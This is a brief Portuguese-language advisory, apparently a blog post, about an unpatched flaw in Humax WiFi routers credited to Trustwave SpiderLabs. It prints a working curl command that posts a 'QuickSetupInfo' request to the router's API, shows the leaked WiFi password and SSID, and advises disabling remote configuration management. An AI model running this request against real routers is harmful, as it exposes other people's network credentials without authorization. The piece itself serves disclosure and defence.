A vulnerabilidade foi descoberta por Simon Kenin da Trustwave SpiderLabs onde ele detalha passo a passo como explorar a vulnerabilidade. Ate o momento nenhum patch de correção foi disponibilizado para a correção.
Fonte : www.trustwave.com/Resources/SpiderLabs-Blog/0-Day-Alert--Your-Humax-WiFi-Router-Might-Be-In-Danger
Digite o comando abaixo:
Linuxcurl -X POST -H 'Content-Type: application/x-www-form-urlencoded charset=UTF-8' -d '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}' http://192.168.0.1/api
No final o resultado do comando é exibido o SENHA e o NOME (SSID) da rede WiFi.
"password": "#1!DZ2eq0UlAP@#", "ssid": "100SECURITY",
Enquanto nenhum patch de correção foi publicado certifique-se que o Gerenciamento de Configuração Remota esteja Inválido/Desativado para evitar que seu roteador WiFi seja invadido.
Menu: avançado > Definir > Gerenciamento de Configuração Remota